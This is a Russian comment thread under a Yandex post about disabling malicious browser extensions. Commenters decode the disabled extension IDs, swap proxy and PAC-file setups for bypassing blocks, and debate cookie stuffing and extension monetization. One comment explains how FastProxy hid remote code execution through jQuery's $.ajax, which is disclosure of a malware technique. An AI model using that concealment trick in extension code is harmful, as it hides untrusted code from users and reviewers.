Яндекс отключил расширения с аудиторией в 8 млн пользователей. Объясняем, почему мы пошли на такой шаг

[AndreyYu]

Список id отключенных расширений:
acdfdofofabmipgcolilkfhnpoclgpdd — VDP: Best Video Downloader
oobppndjaabcidladjeehddkgkccfcpn — Y2Mate — Video Downloader
aonedlchkbicmhepimiahfalheedjgbh — Помощник
aoeacblfmdamdejeiaepojbhohhkmkjh — RadioGaGa
eoeoincjhpflnpdaiemgbboknhkblome — x3
onbkopaoemachfglhlpomhbpofepfpom — x3
inlgdellfblpplcogjfedlhjnpgafnia — x3
ejfajpmpabphhkcacijnhggimhelopfg — x3
pgjndpcilbcanlnhhjmhjalilcmoicjc — x3
napifgkjbjeodgmfjmgncljmnmdefpbf — x3
glgemekgfjppocilabhlcbngobillcgf — x3
klmjcelobglnhnbfpmlbgnoeippfhhil — x3
ldbfffpdfgghehkkckifnjhoncdgjkib — x3
mbacbcfdfaapbcnlnbmciiaakomhkbkb — friGate CDN
mdnmhbnbebabimcjggckeoibchhckemm — friGate Light
lfedlgnabjompjngkpddclhgcmeklana — SaveFrom.net помощник
mdpljndcmbeikfnlflcggaipgnhiedbl — x3
npdpplbicnmpoigidfdjadamgfkilaak — x3
ibehiiilehaakkhkigckfjfknboalpbe — x3
lalpacfpfnobgdkbbpggecolckiffhoi — x3
hdbipekpdpggjaipompnomhccfemaljm — friGate3 proxy helper
gfjocjagfinihkkaahliainflifnlnfc — x3
ickfamnaffmfjgecbbnhecdnmjknblic — x3
bmcnncbmipphlkdmgfbipbanmmfdamkd — x3
miejmllodobdobgjbeonandkjhnhpjbn — x3
х3 — не находится в Chrome Web Store

[kukutz]

х3 — не находится в Chrome Web Store

Не совсем так, некоторые из них там есть, просто надо не поиском пользоваться, а подставлять ID: chrome.google.com/webstore/detail/coupons-at-checkout/onbkopaoemachfglhlpomhbpofepfpom?hl=ru

Некоторые из Opera Store, некоторые уже удалены из обоих сторов.

[AndreyYu]

Все что описаны, находятся в Chrome Web Store. поиск через ID и осуществлялся.

[kukutz]

Ну я привел вам пример того, про который вы написали «х3», но который есть в Chrome Web Store. Он такой не один.

[AndreyYu]

Странно, да, действительно, через поиск не находится

[vism]

вот блин
friGate3 proxy helper удобен…

Сообщество, что вы используете для удобного включения прокси для определённых сайтов?

[Virgo_Style]

HandyCache, но это не расширение, а отдельный прокси с возможностью использования внешних прокси по заданным условиям.

[jryj]

SwitchyOmega правда он для FF

[Coolmax]

Почему же? Он у меня в Chrome несколько лет прекрасно работает.

[vism]

есть под хром. И кажется это удобно. Можно отдельные сайты(заблокированные) гнать через прокси, а остальные «direct»

[ProRunner]

friGate CDN мне ещё нравился, что там ещё автоматом подключается поддержка .onion сайтов. Есть ещё подобные расширения, кто-то использует?

[vikarti]

А надо расширения?
Tor полноценно поднятый на хоумсервере в виртуалке
+.pac файл где сказано что на .onion — ходить через Tor

[AlexNoo]

Ещё бы подробнее найти что-то хоть про написание pac-ов. То работает, то нет. В Опере Блинк свежей, например.

[vikarti]

developer.mozilla.org/en-US/docs/Web/HTTP/Proxy_servers_and_tunneling/Proxy_Auto-Configuration_(PAC)_file

[AlexNoo]

Да я уже разное про него смотрел, и примеры разные изучал. Но проблема в том, что много вообще неясного вокруг них. Например, что надо сделать в Опере Престо, чтобы применилось изменение pac-а. Или вот, в свежей Опере Блинк просто не работает, и всё. И как назло, все примеры очень разные, в одном одно используют, в другом другое.

[Zverienish]

А потом friGate сливает небось куда вы ходите. Смысл этого.

[ahiMNix]

Смысл есть.
Например обойти локальные блокировки.

[Zverienish]

Есть тор, есть опера с впн. Пользоваться расширениями, которые явно будут делать мутное что-то, чтобы монетизироваться.

[token_zero]

«Opera VPN» это скорее прокси, нежели VPN. А тот факт, что трафик идёт от браузера до «родных» серверов, даёт повод сомневаться, что этот трафик не анализируется компанией Opera.

[Carburn]

А прокси где взять?

[Xazzzi]

proxy switchy omega есть и под хром

[Redrik_Shuhart]

warp от cloudflare

[navion]

Не работает на Windows 8.1.

[13_beta2]

Работает, пользуюсь. Удобно, что громадное приложение для управления не нужно запускать — есть лаконичный cli.

[navion]

Спасибо, последние беты даже не устанавливались, а релиз заработал на 8.1.

[Bonio]

FoxyProxy

[Xobotun]

Поддерживает запароленный Socks5, в отличие от хрома, да.

[Vilgelm]

На Хромиуме (Хроме) не поддерживает. Есть только одно расширение, которое поддерживает это на Хромиуме, но оно умеет работать только с одним прокси.

[PTM]

Tor bundle ( установлен как сервис) + foxyproxy

[u007]

Browsec? Правда, автоматом включается только на одном избранном сайте.

[sam47kon]

Аналогично) Правда с ним «тяжелее» грузятся сайты, но что поделать… вроде фригейт уже как то раз отсутствовал в хром-магазине, я тогда брату настраивал комп, и пришлось выкачивать файл расширения с моего компа и вручную пихать в его хром.
Может снова когда-нибудь появится.

[GDragon]

Я возможно не совсем по теме (всё таки речь больше о Chrome-based браузерах) но фригейт был и на используемой мной мозилле, как его замену я использую github.com/salarcode/SmartProxy (есть и для хрома)).
Единственное что прокси надо самому искать, но с фригейта я в своё время потому и слез что пред-настроенные прокси пропали.

[vism]

вот в этом и дело. прокси приходится менять вручную и я не нашел такого, где автоматом.
SwitchyOmega тоже надо прокси ставить вручную :(
фригейт прокси стабильно работал(работает) в этом плане :)

[Vilgelm]

В FoxyProxy можно писать правила для каждого прокси, делать black и white листы сайтов

[Tyusha]

Теперь вы знаете, в каком месте расширение Frigate его надо сломать, чтобы оно не вредило. Сделайте из него свой userscript, оставив только хорошее.

[vism]

Тут всё же надо знать где и что меня. Или разобраться, на что уйдет пару часов точно:)
А потом еще разбираться как его выложить для всех и т.п. Тоже фиг знает сколько времени.

А вот если кто-то, кто в этом уже разбирается пересоберёт Frigate и выложит, было бы здорово:)

Серьезно, если это просто, подскажите как это делается по шагам. Я бы пересобрал friGate3 proxy helper, но вот как выложить уже не знаю, да и наверное это будет нарушением авторских прав на оригинальный код

[Tyusha]

1). Проще всего надо найти место с URL конфигуратора и похерить. Вряд-ли это приведёт к потере легальной функциональности.

2). Я имела ввиду, что это можно на раз-два сделать для себя до точно хотя бы.

[unwrecker]

Штатный функционал: автоконфигурация прокси через pac-файл. Сам файл беру с antizapret.info — там уже прописана логика включения, и прописываю в нём свой прокси.

[AlexNoo]

Готовый — это же не спортивно! Надо самому написать его. :-)

[dilukhin]

Хочу, хочу неспортивно! Где, говорите, там файл взять?

[AlexNoo]

Ориентироваться можно и на тот pac, что в комплекте i2p есть… Я его за основу взял.

[Vilgelm]

FoxyProxy, он хоть устарел и импорт\экспорт поломался, но до сих пор работает.

[gdt]

Да, FriGate очень удобная штука (была). Для себя выяснил, что единственный заблокированный сайт, на который приходится заходить время от времени — это r*tracker, который имеет собственное расширение. В остальных случаях использую VPN.

[hzs]

Browsec

[Black_and_green]

'Обход блокировок Рунета' — очень хорошее расширение, умеет работать, как со встроенным прокси, так и своими socks|http-прокси и локальным tor (можно установить, как сервис в windows)

[mellon37]

Proxy SwitchyOmega
в нем можно PAC профиль создать с адресом РАС загрузкой локально и обновлением.
то есть тот же самый антизапрет будет у тебя новый храниться локально обновляться и управлять перенаправлением запросов

[CynepHy6]

github.com/anticensority/runet-censorship-bypass/wiki

[intender]

FastProxy

[ValdikSS]

Уж что-что, а в FastProxy использовался самый очевидный для разбирающихся в jquery метод исполнения загруженного кода, но совершенно не очевидный для людей, не часто пользующихся jquery.

at the first glance, you won't find any eval() or chrome.tabs.executeScript() calls in this extension. Don't be fooled, this extension uses jquery library, which AUTOMATICALLY EXECUTES any downloaded script using $.ajax() call. This is documented jquery functionality, but if you don't know about that, you'll be puzzled.

Разработчик FastProxy какое-то время использовал прокси-серверы АнтиЗапрета, без разрешения проекта, и заменял страницу с ошибкой открытия сайта на свой текст. Я включил в страницу ошибки MutationObserver и переадресовывал пользователей на вот эту страницу:

antizapret.prostovpn.org/fastproxy-warn

[intender]

mester пишет: на фоне хромовской версии, фаерфокс версия вообще полностью безопасна
Фух, я в firefox им и пользуюсь.

[Oxyd]

FoxyProxy и в лисе и в хромообразных.

[ValdikSS]

См. habr.com/ru/company/yandex/blog/534586/#comment_22469840

[Oxyd]

Так это коммент про FastProxy, а у меня-то FoxyProxy.

[SkyHunter]

Avira Phantom VPN

[z3apa3a]

Использую PAC-файл, никаких дополнительных расширений при этом не требуется. Работает в любом браузере. Прописывается как URL автоконфигурации в настройках прокси, для Window URL выглядит примерно так:
file:///c:/путь/proxy.pac
сам файл:
function FindProxyForURL(url, host)

{

var domains = [
"visualwebsiteoptimizer.com",
"amazonaws.com",
"tribl.io",
"olark.com",
"linkedin.com",
"archive.org",
"telegram.org",
"telegram.me",
"t.me",
"slideshare.net",
"lurkmore.to",
"upyachka.io",
"protonmail.com",
"anonfiles.com"
];
var len = domains.length, i;
if(isInNet(dnsResolve(host), "5.3.3.0", "255.255.255.0")) return "PROXY proxy.example.ru:3128"; /* обнаруживает блокировку DNS'ом в domru */
for(i=0; i<len; i++) if(dnsDomainIs(host,domains[i])) {
/*
if(isInNet(myIpAddress(), "192.168.0.0", "255.255.255.0")) return "PROXY 192.168.0.2:3128";

else

- можно выбирать в завимости от сети, к которой производилось подключение
*/
return "PROXY proxy.example.ru:3128";
}
return "DIRECT";

}


[playnet]

Амазон и телеграм — нет же в бане? Телегу так вообще официально помиловали, а амазон в бане вообще не был (дольше небольшого времени), и там бан по сети был, а не признаку что это амазон

[AlexPetroff]

Простенький VDS например vultr (Германия) или timeweb (Россия) +
— github.com/jawj/IKEv2-setup
— github.com/kylemanna/docker-openvpn

[asm0dey]

FoxyProxy

[BellaLugoshi]

Как мне кажется иметь на ПК несколько установленных браузеров и пользоваться тем или иным в определённых ситуациях — реалии современной жизни. Поэтому ставьте браузер Opera и пользуйтесь встроенным VPN, что я давно и делаю. В моей работе это нужно только для двух сайтов.

[Dee3]

Спасибо тебе мил человек. Не понятно что мешало это сделать ребятам из Яндекса

[Carburn]

gfjocjagfinihkkaahliainflifnlnfc — скачать-музыку-c-vk
Остальные — download.master, savefrom.net и frigate (помимо Автоматическое применение купонов
).

[AlexNoo]

И чем же дополнение DownloadMaster-а заменить??

[Carburn]

Зачем оно нужно? программу используй

[AlexNoo]

Чтобы:
а. отправлять ссылки все или одну со страницы в DM.
б. чтобы находить и перехватывать медиа-файл со страницы.

[token_zero]

Internet Download Manager — standalone программа + расширения для разных браузеров. Пользуюсь много лет. Позволяет сохранять видео со многих сервисов, поддерживает докачку, пакетное скачивание. Обновляется регулярно. Платная, но встречается и …

[anton21m]

Продолжим расшифровку
acdfdofofabmipgcolilkfhnpoclgpdd — VDP: Best Video Downloader
oobppndjaabcidladjeehddkgkccfcpn — Y2Mate — Video Downloader
aonedlchkbicmhepimiahfalheedjgbh — Помощник
aoeacblfmdamdejeiaepojbhohhkmkjh — RadioGaGa
eoeoincjhpflnpdaiemgbboknhkblome — Автоматическое применение купонов(https://savematik.com)
onbkopaoemachfglhlpomhbpofepfpom — Автоматическое применение купонов (Автор: shopscoupons.fr)
inlgdellfblpplcogjfedlhjnpgafnia — Автоматическое применение купонов (Автор: shopscoupons.br)
ejfajpmpabphhkcacijnhggimhelopfg — Автоматическое применение купонов (Автор: caa.newstore)
pgjndpcilbcanlnhhjmhjalilcmoicjc — Автоматическое применение купонов (Автор: frcouponsapp)
napifgkjbjeodgmfjmgncljmnmdefpbf — Автоматическое применение купонов (Автор: frcouponsapp)
glgemekgfjppocilabhlcbngobillcgf — Автоматическое применение купонов (Автор: couponsatcheck)
klmjcelobglnhnbfpmlbgnoeippfhhil — Автоматическое применение купонов (Автор: shopscoupons.store)
ldbfffpdfgghehkkckifnjhoncdgjkib — Автоматическое применение купонов (Автор: sh.coupons.fr)
mbacbcfdfaapbcnlnbmciiaakomhkbkb — friGate CDN
mdnmhbnbebabimcjggckeoibchhckemm — friGate Light
lfedlgnabjompjngkpddclhgcmeklana — SaveFrom.net помощник
mdpljndcmbeikfnlflcggaipgnhiedbl — УДАЛЕНО
npdpplbicnmpoigidfdjadamgfkilaak — УДАЛЕНО
ibehiiilehaakkhkigckfjfknboalpbe — УДАЛЕНО
lalpacfpfnobgdkbbpggecolckiffhoi — УДАЛЕНО
hdbipekpdpggjaipompnomhccfemaljm — friGate3 proxy helper
gfjocjagfinihkkaahliainflifnlnfc — УДАЛЕНО
ickfamnaffmfjgecbbnhecdnmjknblic — УДАЛЕНО
bmcnncbmipphlkdmgfbipbanmmfdamkd — УДАЛЕНО
miejmllodobdobgjbeonandkjhnhpjbn — УДАЛЕНО

[gusev]

Прямо сейчас на главной странице SaveFrom.net висят тезеры «богатого богатства»
Возможно проект взломан или продан.

[Hotty]

Подскажите — я верно понимаю, у вас на главной отображается страница в странице после захода?

P.S. разобрался, это вы наложили страницу перехода и страницу savefrom

[gusev]

Нет, на главной отображается тизер (правый угол, сверху) при клике на который отображается страница «невероятное везение официанту ....»

[JimDi]

обычная реклама, коих полно на такого рода сайтах, чему тут удивляться?

[BioHazzardt]

Зашел только что, ничего такого нету.
З.Ы. у меня установлен адблок

[Banochkin]

Вот ведь неожиданно, стоит адблок и нет рекламы.))

[kukutz]

Какие и почему?

[kukutz]

Смотрите, они же не встроены, это просто список, витрина. Они скачиваются и устанавливаются только после включения пользователем.

[water_arm]

Добрый день, Ув. Яндекс.
Сделайте пожалуйста, кнопку ОТКЛЮЧИТЬ ВСЕ информеры\всю нечисть из дзена\и все персональные подборки.
Почему они по умолчанию включены и так ясно, но не делать умышленно кнопки «отключить все» — это уже издевка (

[kukutz]

У всех блоков есть возможность отключения. Если у какого-то нет, подскажите, у какого, пожалуйста?

[dead_undead]

Общая кнопка, которая отключает все блоки разом.
Далее выборочно юзер включает что ему нужно.
А не выборочно выключает.

[kukutz]

Подумаем, спасибо.

[samrrr]

Подобные жалобы видел и пару лет назад, и с тех пор ничего не поменялось. И при появлении новой нечисти она сразу включается.

[fedoralex]

Думаешь они из-за пары жалоб откажутся от конверсии пользователей на их сервисы? Рублем карать надо — не пользоваться.

[samrrr]

Думаю, что лох не мамонт.

[kukutz]

Погодите, вы не про браузер, а про сайт Яндекса?

Так вот же, всё выключил: ya.ru

[Xokare228]

Адблок подобную нечесть убирает

[AlexNoo]

Самое интересное, что эти баннеры показывает везде, во всех браузерах, даже когда сам Я.Браузер давно уже стоит на компе!

[nikolayv81]

Там это, всплывает потом "установите наш браузер" :)

[andersong]

Недавно спрашивал в ТП о возможности отключения показа видео на Дзене. Сказали, что возможности отключения видео нет.

[iandarken]

Я тоже спрашивал. Меня убеждали, что «нельзя никак, кококо». Но можно. Вроде, как-то так

yandex.ru##.card-video-block

[chelovek-jpeg]

По-моему проще вообще не пользоваться яндекс-браузером. Тот же brave гораздо лучше по всем параметрам

[0xf0a00]

А может просто FF использовать вместо непонятных надстроек над хромом.

[chapuza]

непонятных надстроек над хромом

Вот сейчас смешно было. CEO «непонятных надстроек над хромом» — Brendan Eich, погуглите, кто такой; а CTO — Brian Bondy.

ФФ уже лет шесть можно использовать только из жалости к стюардессе, когда нужен браузер «ни одного логина» (инкогнито не совсем так работает, если что).

[chapuza]

бодрее текущего хрома

Не знаю, мне не приходилось запускать его на кофеварке; на компьютере я разницу не замечаю.

на порядок свободнее

Чем ядро движка chromium? Разве что, в голове у стюардессы.

как оно работает?

Ну только ленивый еще не видел ни одну из миллиарда публикаций «что на самом деле утекает в инкогнито моде».

[asm0dey]

Я почитал пор Брендана и не совсем понимаю что именно в его карьере наводит на мысль о том, что он может быть и будет хорошим CEO. Он даже CTO был не оч долго, а CEO — это совсем другая ответственность в другой сфере.

[chapuza]

Вообще ничего не наводит на мысли о том, что он может быть неплохим CEO. Да у меня и нет таких мыслей.

Но ведь и я не акции покупаю, а браузер выбираю. И мне понятнее надстройки, которые будут сделаны Эйком, а не непойми кем в ФФ.

[asm0dey]

Ну Эйк работал в Мозилле пока всё было хорошо, так что не то что бы он прям непонятно кто в мозилле :) Сейчас его там уже нет, но не так долго, надо сказать.

[chapuza]

Ключевое слово «будут».

[Crazy_Pit]

у меня стоит мажордомо. и там есть голосовой помощник с имеем алиса. встроенный в яндекс браузер помощник тезка. они борются за право «первой ночи» яндекс удаляю. тк умный дом важнее.

[zv347]

Можно открыть «Установка и удаление программ» в Windows и удалить Алису отдельно от браузера (как я и сделал сразу после установки).

Другой вопрос, зачем ее поставлять в комплекте с браузером. Или, например, зачем в почте календарь и телемост на самом удобном месте, а чтобы открыть отправленные письма надо тянуться незнай куда третьей рукой. Но это всё вопросы риторические.

[zuek]

Извините, недопонял про "Отправленные" — что с ними не так?

Типичная Я.Почта

[zv347]

My bad. Имел в виду мобильное приложение. Там список папок открывается свайпом слева или гамбургером в левом верхнем углу. Из-за размеров современных телефонов не удобно ни то, ни другое, свайп нужно делать аккуратно, иначе свайпается письмо. Зато телемост — в нижней панели.

[playnet]

Я конечно точно не знаю, но мне помнится что Алиса это изначальная фича яндекса, к которой примазался majordomo. А вообще обычно можно сменить имя помощника, у домы этого нет?
зы у меня HomeAssistant (пока) — такой проблемы нет.

[Crazy_Pit]

нет вы неправы. в мажордомо алиса появилась раньше. и можордомо не примазывался к яндексу. проблема в том что мне алиса от яндекса ненужна а имя у алисы из яндекса я сменить не могу. а имя у алисы из можордомо сменить не хочу тк привык.
решение проблемы подсказал zv347 постом выше. попозже попробую.

[asm0dey]

Имя Алисы от Яндекса можно поменять на Яндекс ЕМНИП

[Crazy_Pit]

спасибо. много браузеров не бывает. поставим и яндекс. хотя пока у меня отношение к нему как амиго браузеру. надеюсь я неправ.

[kukutz]

Не заменили, в браузере есть и локальные закладки, и облачные коллекции.

[kukutz]

Этот недочет про создание папок закладок планируем исправить, да.

[Cryvage]

поэтому приняли решение отключить в Яндекс.Браузере уже установленные копии расширений SaveFrom.net, Frigate Light, Frigate CDN и некоторых других. Пользователи этих расширений получат уведомление, в котором мы расскажем о причинах отключения. После этого они смогут принять осознанное решение и при необходимости включить их вновь (хотя мы настоятельно рекомендуем так не поступать

ИМХО, тут надо выпиливать с корнем. Всё же, расширения содержат возможность запускать вообще любой код. Кто знает, что сделают владельцы, узнав что «Гипс снимают. Клиент уезжает».

[kukutz]

Если сделают что-то ещё плохое, то сразу же жестко заблокируем, конечно.

[Aquahawk]

когда убьют, тогда и приходите.

[Osnovjansky]

Плохого или незаконного? Незаконное — да. Надо банить. А «плохое» для каждого своё.

[kryvichh]

Использование ресурсов компьютера пользователя без его ведома в Беларуси можно рассматривать с точки зрения уголовного права. Обфусцирование кода, подгрузка непроверенных скриптов говорят о том, что разработчики приняли специальные меры, чтобы не связанная с основной функцией деятельность их расширения осталась незамеченной.

[Osnovjansky]

В целом, мне тоже такое поведение не нравится, но баны по произволу почти монополистов (я про отрасль в целом: ютуб, андроид, магазин плагинов ...) на мой взгляд гораздо хуже.

Информировать пользователей о «скользком» поведении — плюсую двумя руками, а вот банить — только за действия, для которых вынесено судебное решение, или видно что они явно незаконны. И тут ещё встает вопрос, а по законам какой страны (браузера, авторов плагина или пользователя)?

[vikarti]

Но пользователь же согласится с EULA
(а если так незаконно — то например и протекторы (тот же Denuvo/VMProtect) незаконны — обфускация ж, и (тем более) Warden из WoW (и аналогичная штука в EVE Online) — там прилетает код с сервера периодически и смотрит вообщем что ему надо, и отсылает результаты, если заблокировать — в EVE сразу будет вылет)
Да и наверно Win10, с ее добровольно-принудительно установкой обновлений, часто без внятных описаний что они делают.

[vikarti]

Это как минимум у WoW есть (люди судились даже).
EVE'овский код вообщем то достаточно безобиден (ну — те образцы что мне в лапки попали несколько лет назад). Там:
— попытка идентифицировать компьютер (хеши MAC'ов сетевых, хеши данных видеоадаптера,etc).
— попытка проверить что в особо интересных местах кода на Stackless Python — находится изначально загруженный игровым клиентом с диска код (подменить загружаемы код — скажем так затруднительно, там шифрование и подписи).
И все. Список запущенных приложений насколько помню — не сканируется (хотя это возможно).

[ifap]

ИМХО тут поможет только политика zero tolerance: одного раза достаточно для расстрела без права на УДО и апелляцию. Только это может напугать тех, кто обдумывает пойти по стопам жулья. А то будет как с Пейсбуком:
1. Ой, это мы случайно, больше не будем.
2. Goto 1.

[rPman]

тут поможет только запрет исполнения случайного кода, все должно быть подписано, на уровне браузера контролировать, так как теперь расширения ставятся из центра — пусть подпись центра и используется.

[vikarti]

Как быть разработчикам?
Как быть если расширение полноценное не надо но достаточно user script'ов?(с одной стороны — SaveFrom у меня через Tampermonkey и работал на Chrome(в отдельном профиле под эти задачи), с другой стороны — есть куча полезного)
Как быть если расширение нарушает политику конкретного центра но само по себе — белопушистое (ну кроме — прогибатся под стор)?
Кстати а какую именно подпись должны проверять Яндекс браузер и новый Edge? Гугла (они ж могут с гуглостора ставить расширения) + свою?
Хотя как опция — это было бы интересно, как и детектор обфускации

[BMXer_V]

То же самое хотел написать.
С одной стороны, командой Яндекса проделана огромная и полезная работа. С другой — производители расширений-зловредов, по сути, вообще никак от этого не пострадали. То есть риска у такой противоправной деятельности по сути нет: не попался — хорошо, продолжаешь зарабатывать свои преступные деньги, попался — ну перестал, но ничего не теряешь. Можно начинать с начала. И вот именно здесь кроется корень проблемы. Должна быть хоть какая-то ответственность, хотя бы экономическая. Либо белые списки и код расширения, подписанный магазином. И запрет на подгрузку чего бы то ни было другого. Причём все остальные расширения удалять не нужно, можно их оставить. Но пользователь должен в явном виде иметь информацию, что вот это расширение точно безопасное, а вот это — уже на свой страх и риск.

[kspshnik]

Safari скучает по Вам: о)

[burzooom]

И любой инспектор получает права диктатора. Как вам ситуация, что вам напишет инспектор с Яндекса, в частном порядке, шантажируя вырубить ваше расширение, если не сделаете взнос на биткоин-кошелек

[ifap]

С тем же успехом непорядочный инспектор может придумать и другой повод для шантажа, все так же рискуя вместо битков получить пинок под зад от работодателя и приговор суда за вымогательство. Давайте все же отделим мух от котлет, тем более что куда опаснее т.с. институциализация подобной практики, когда неугодные расширения вылетают из сторов потому, что начинают противоречить коммерческим интересам владельца стора.

[teemour]

выглядит как реактивное компульсивное поведение
прекратите истерику — говорят в таких случаях
расстрел без апелляции, боже мой, как это должно работать, как запугивание и атмосфера страха
с вами родители и на работе тоже так поступают?

[ilya-zharskiy]

Ты так договоришься до того, что Яндекс.Трусы забанит в магазине расширений Советник Яндекс.Маркета

[Gostra]

Крутая работа, спасибо!

[Andrey_Petroff]

Сегодня Касперский стал ругаться, что в Хроме заблокирован переход по ссылке gatpsstat.com/ext/stat. Полез в Гугл и тут эта статья! Отключил Savefrom.net и тишина!

[Georgy9]

Та же самая история. Больше часа продолжались попытки что-то там загрузить. И тут это сообщение…
Спасибо всем ребятам, хорошо сработали.

[Zm3y]

та же история с фригейтом

[Tyusha]

Представляю, как мэлварщики ржали, когда к ним Яндекс обратился первый раз насчёт левого звука. "Да-да, спасибо Яндекс, не волнуйтесь, мы сейчас починим наше расширение".

[vaque]

да у меня такая же беда где-то в обед началась, переменял всё пароли, обновил хром, про сканировал ноут. только здесь понял проблему. Спасибо большое!

[tundrawolf_kiba]

С расширениями у меня с месяц назад была еще другая проблема — если были установлены Selenium IDE и/или Katalon IDE — то висли вкладки со статьями из Дзена(и изредка с некоторыми другими сайтами от Яндекса такое происходила)

[NEDVonline]

Свинство, конечно… И ведь непонятно, сколько еще таких расширений различным способом пользуют наши компьютеры. Но у меня отключился savefrom.net в ЯБ с уведомлением что-то вроде «использует много ресурсов».

[dartraiden]

«Вирусы» в расширениях на примере FastProxy

[dimskiy]

А что свинство? Вы ничего за эти расширения не платите. Очевидно, что монетизация происходит как-то иначе.

[fireSparrow]

Если без уведомления и согласия пользователя — то свинство.

[dimskiy]

Вы никогда не интересовались на чем зарабатывают Я\G\F и прочии фаанги? :) Если верить разным разоблачительным статьям тут же на хабре, то далеко не вся их деятельность описана в пользовательском соглашении

[fireSparrow]

По поводу остальных фаангов не скажу, а про то, чем зарабатывает Яндекс, я довольно хорошо изнутри представляю. Ни с чем, что я мог бы отнести к категории «свинство», я не сталкивался.
Но разоблачительным статьям с хабра, конечно, виднее ))

[dimskiy]

Не думаю, что вы в курсе абсолютно всей деятельности вашей компании. Я ничего не пытаюсь придумать и ни на что не намекаю, но уверенность что вы прям все хорошо представляете — ошибочна. Больше сомнений, что ли :)

[fireSparrow]

Я не говорю, что в курсе абсолютно всей деятельности.
Но, во-первых, с достаточно многими аспектами я всё-таки сталкивался. Во-вторых, по моему опыту, большинство сотрудников Яндекса — порядочные люди. В среднем ощутимо более порядочные и идейные, чем в целом по популяции.
Так что

Больше сомнений, что ли :)

у меня вызывают как раз «разоблачительные статьи» если в них нет никакой конкретики, только общие домыслы.

[dimskiy]

Ну раз все с кем вы имели дело — порядочные люди, то конечно.

[DoctorMoriarty]

>Я\G\F и прочие

… не заставляют мой компьютер майнить биткойны. А по поводу остального — погуглите, где приобрести шапочку из фольги на свой вкус.

И уж тогда, чтобы без двойных стандартов и намеков на конспирологическое «бесплатный сыр в мышеловке», «если вам не продали, то продали вас» и т.п. многозначительное бла-бла-бла — меняйте платформу для разработки. А то что же, разрабатываете для Android, принадлежащего Google, поддерживаете непорядочную корпорацию? :-) Будьте последовательны, только free soft, только хардкор!

[dimskiy]

Если вам очень хочется перейти на личности и поучить меня жить — почитайте что такое AOSP и какую роль в «free soft» он играет

[KorDen32]

не заставляют мой компьютер майнить биткойны

Учитывая производительность некоторых приложений G/F, уж лучше бы они биткоины майнили… Любое гуглоприложение на голом смартфоне с Android One или на Google Pixel можно привести в пример.

[StjarnornasFred]

Кстати, а если серьёзно. Майнинг биткоинов — это же довольно интересное и оригинальное решение, как монетизировать сайт и при этом не показывать пользователю рекламу.

[rPman]

Очень маленький доход, само собой майнить придется не биткоины а альткоины, и даже в этом случае один клиент посидев даже час на машине не принесет профита который был бы сравним с рекламными бюджетами.

[XAHOK]

Вы опоздали лет на 5, большая часть майнеров уже давно в черных списках антивирей и адблоков. Ибо взлетающий ноут бесил людей больше, чем реклама.

[KivApple]

Не заставляют майнить биткойны, зато заставляют смотреть рекламу. Отказаться от неё тоже нельзя, уведомлений о ней никаких нет (просто рекламу сразу видно, а майнинг биткойнов происходит в фоне и не виден явным образом). Майнинг биткойнов тратит ресурсы компьютера, просмотр и фильтрация рекламы тратит ресурсы вашего мозга. Что хуже — под большим вопросом.

[mistergrim]

У Google, например, очень подробное соглашение об использовании, и при каждом его изменении он настоятельно рекомендует его перечитать. А что «не вся описана» — ну это из разряда «власти скрывают».

[Vilgelm]

Есть относительно безобидные виды монетизации, типа перехвата партнерских кук на Алиэкспресс и в других магазинах. Для большинства это незаметно (если кешбек сервисами не пользоваться) и не очень вредоносно. А вот то что в статье — это свинство. Учитывая выполнение произвольного когда они могли вообще поднять на вашем компьютере прокси, а потом бы вас посадили как Богатова. Это уже не безобидная монетизация.

[klis]

Не надо путать теплое с мягким. Если вас надо будет посадить, как Богатова, вас посадят. Это никак не связано с выполнением произвольного кода где бы то ни было. А вот сколько Богатовых прописалось по хатам благодаря бесконтрольному и незаконному сливу Яндексом персональной информации пользователей — большой вопрос.

[kukutz]

Яндекс не занимается незаконным сливом информации. Яндекс отвечает только на запросы правоохранительных органов различных стран, на которые должен ответить согласно законодательству, и только если они оформлены надлежащим образом.

[klis]

Ну вот, опять автоответчик… ))
Ну да, ну да. Google продает инфу на лево и на право, Facebook продает инфу на лево и на право, ФСБ само продает инфу на лево и на право, но Яндекс белый и пушистый, конечно.
Лично вы работали с силовиками? Или, быть может, лично вы отказывали силовикам в предоставлении какой-либо информации без официального запроса?
Я убежден, что после пары таких отказов, Яндекса уже бы не существовало.

[kukutz]

Да, постоянно отказываем в выполнении ненадлежаще оформленных запросов.

[oskolade]

Для любителей почитать www.proekt.media/narrative/yandex-i-kreml
И посмотреть youtu.be/fHv9BEGkmQU

[klis]

А… ну спасибо, что сказали. Теперь я вам поверил…

[balamutick]

После ситуации описанной в статье Новой газеты «Прогнётся всё» — не верим вам ни бита.

[Vilgelm]

За ним специально не охотились, просто кто-то с его айпи что-то разместил. Сам он не был оппозиционером или кем-то таким, просто случайная жертва системы

[habrohabrouser]

Безобидные? Вы уверены в понимании ситуации? За эти «безобидные» дают реальные тюремные сроки. Это воровство рекламного бюджета у Алиэкспресс и других магазинов. Это также воровство партнерских отличеслений у всевозможных вебмастеров, ютуб блогеров, контентных сайтов, владельцев соц. групп и т.д. и т.п.

[Vilgelm]

У вас есть пример когда за подобную монетизацию давали тюремные сроки? Для пользователя это вполне безобидно, если он не использует кэшбек. Для Алиэкспресса в общем-то тоже, потому что они все равно платят за трафик и трафик с расширений не запрещают, хотя такая возможность есть, значит их устраивает. Кто получит вознаграждение — блогер или автор расширения Али в общем-то плевать. Можно с таким же успехом сказать, что кэшбек сервисы воруют отчисления у блогеров.

[habrohabrouser]

Вы прикидываетесь или занимаетесь сами перехватом партнерских кук и такими речами пытаетесь приуменьшить значимость проблемы? Надеюсь вы просто не разобрались в теме. Объясняю.

1. То, что вы называете перехватом кук, называется куки стаффингом. В комментариях тут это уже упоминали в отрицательном ключе.
2. Для условного работника хладокомбината, который решил заказать микросхему для своего хобби — перехват кук действительно полностью не имеет значения, потому покупатель ничего не теряет. Но никто и не говорит, что криминал именно в этом.

3. Для Алиэкспресса в общем-то тоже, потому что они все равно платят за трафик

   Вот тут Вы не правы. Алиэкспресс, как и любой другой рекламодатель, платит только и именно тогда, когда покупатель попал на сайт Алиэкспресс (и совершил покупку) после сознательного перехода по партнерской ссылке аффилиата (партнера). Если сознательного перехода на сайт Алиэкспресс не было, если покупатель зашел сам на сайта Алиэкспресс, то и платить Алиэкспресс никому ничего не должен. Но если в браузере стоит расширение, которое скрытно установило свои партнерские куки, то это уже мошенничество. Расширение не привлекало покупателя на сайт и соответственно Алиэкспресс не должен такое оплачивать. Поэтому они не «все равно платят за трафик».
   

4. трафик с расширений не запрещают

